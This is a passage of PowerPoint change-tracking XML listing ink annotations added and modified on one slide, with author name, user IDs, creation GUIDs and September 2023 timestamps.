          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="16" creationId="{873D3446-5543-9DB5-04B3-894C179FC06C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="17" creationId="{BEB01D4C-CC6B-2D19-3EC7-90B5CFEC4F00}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:37.904" v="4703"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="19" creationId="{AA8F5050-4CB1-3325-4AC9-AB367789563E}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:16.598" v="4730"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="21" creationId="{5ECAE224-7583-EDA9-A46B-B14C932298FA}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:16.598" v="4730"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="22" creationId="{A33297D3-6859-B663-7100-3BF9BEDAB021}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:16.598" v="4730"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="23" creationId="{0A248632-67F1-1141-08E0-638383FF2037}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:16.598" v="4730"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="24" creationId="{BD1D0C5A-38DD-F08B-89F8-BDAC7035ACF6}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:16.598" v="4730"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="25" creationId="{31055DBF-6D03-1D68-C250-DA021CD8DEFD}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:16.598" v="4730"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="26" creationId="{A846F06D-4C9B-50F8-7CA0-25030C88B8AB}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:16.598" v="4730"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="27" creationId="{994A038C-4AB0-2098-5537-71A794A3D6F6}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:16.598" v="4730"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="28" creationId="{56A6A791-283C-FACF-E842-E89A63F99F9E}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="30" creationId="{7AD0A067-B529-7C81-09E0-BA8655D3FBC9}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="31" creationId="{031D927A-71BB-13E4-3783-A99A1853B84D}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="32" creationId="{15149E86-1633-7F4F-1B84-6CAF0F9A07FF}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="33" creationId="{7F6F41E6-5E02-35E1-5406-86A5795C5D34}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="34" creationId="{032A9DD2-093A-2AD4-8F41-C16210065551}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="35" creationId="{32B0593C-E303-46D9-7D7A-822861CB8135}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="36" creationId="{11C08223-FAC4-D0AA-1B91-A30EE84075A2}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="37" creationId="{914BAEBF-8B66-0F61-2914-4E30CCD29EF0}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="38" creationId="{CA95BFFA-D4D4-32E6-3D49-332F196E155C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="39" creationId="{3EBBF78A-1325-6463-95A5-7899048D8EB4}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="40" creationId="{69751993-7D6F-B61C-113C-F3255E3D00E2}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="41" creationId="{97451ED2-528D-D572-3047-7AAE061A68A8}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="42" creationId="{57053711-F637-77C5-4039-840DFC410940}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="43" creationId="{B2586D7D-1DBB-8FFE-1995-939BEF469136}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="48" creationId="{FEE511E1-6A69-E8FC-5487-46BA724B8B10}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="49" creationId="{EF1792DF-74A8-3BB4-3F8C-1F60E4DB59F3}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="50" creationId="{B1DBF282-8A21-3690-664B-ABB8221BF934}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:40.783" v="4707" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="51" creationId="{B428B971-3360-F70E-9820-B0888CAE6E96}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:53.519" v="4720"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="53" creationId="{3E5C3AC5-53F6-66BF-69A2-443502C8346F}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:53.519" v="4720"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="54" creationId="{74D92125-A12C-09D1-29EE-CE92A4F3B25A}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:53.519" v="4720"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="55" creationId="{FC328285-7BC1-03A1-5C7C-2F33165289EF}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:53.519" v="4720"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="56" creationId="{BE3A7D11-650C-CACC-C935-53DCB9886E34}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:53.519" v="4720"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="57" creationId="{C0797A27-0870-0F89-AF48-4969073837C4}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:53.519" v="4720"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="58" creationId="{95B2C97D-4994-BC5B-84B4-F8418590623F}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:53.519" v="4720"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="59" creationId="{36FE5A2F-34FC-BB39-645E-B81739234C3A}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:53.519" v="4720"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="60" creationId="{40631F42-ECAB-43CB-5BF6-6B4DE6883410}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:53.519" v="4720"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="61" creationId="{FDB23202-E2BC-805D-E876-29A2A0FA08AC}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:53.519" v="4720"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="62" creationId="{DDBDE64E-F397-9727-8F1F-1AD002EA1D07}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:55.351" v="4722"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="63" creationId="{E80A1115-3E56-9882-E967-5EC40F080331}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:55.351" v="4722"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="65" creationId="{58B57AAC-3FA7-CA30-D585-BCB11E8DEA6B}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="67" creationId="{4C5E2542-EAA9-5D10-4D64-04192A350FB3}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="68" creationId="{81C94DD6-FC62-7280-69D2-50B32D2FC15A}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="69" creationId="{D93C6B70-E4DB-46B6-9EA2-BE27BB134B05}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="70" creationId="{D7E13CC4-87C1-AAC7-9110-CECA6FA08582}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:16.598" v="4730"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="72" creationId="{75EB6694-3FBD-0646-4832-225519BC48A8}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:16.598" v="4730"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="73" creationId="{8FD17A1C-DD0C-AF71-32DB-4E2DF141FC42}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="75" creationId="{C8FDC76B-29C7-FCF9-6694-036772A75D34}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="76" creationId="{5961019C-4521-76B6-0CD1-C2E03FA3DFB5}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:26.510" v="4772" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="78" creationId="{F3411935-B007-1B0E-CCF3-CE3A1A5B8AEF}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:27.093" v="4773" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="79" creationId="{9FF296D7-F33F-DF91-FD74-A43A51D6B3F7}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:27.484" v="4774" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="80" creationId="{499545EF-6146-1582-2A6F-395102333167}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:27.879" v="4775" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="81" creationId="{726BF0C4-706A-7735-7166-D281CB377CE3}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:28.274" v="4776" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="82" creationId="{B63E962C-3AAB-960D-14C7-F0521EA36E6D}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:28.658" v="4777" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="83" creationId="{011BED25-9107-1448-4BB8-5AC1577C96E1}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:29.002" v="4778" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="84" creationId="{5B11BEF5-7EFE-422F-E03B-B7D46D8CED69}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="85" creationId="{0D24F3CC-0877-6254-7F8C-838181ED5DD6}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="86" creationId="{123391AC-591E-F180-D11E-B156A2AD41ED}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="87" creationId="{7DCB385A-D5FA-28A5-6694-8F5842724D66}"/>
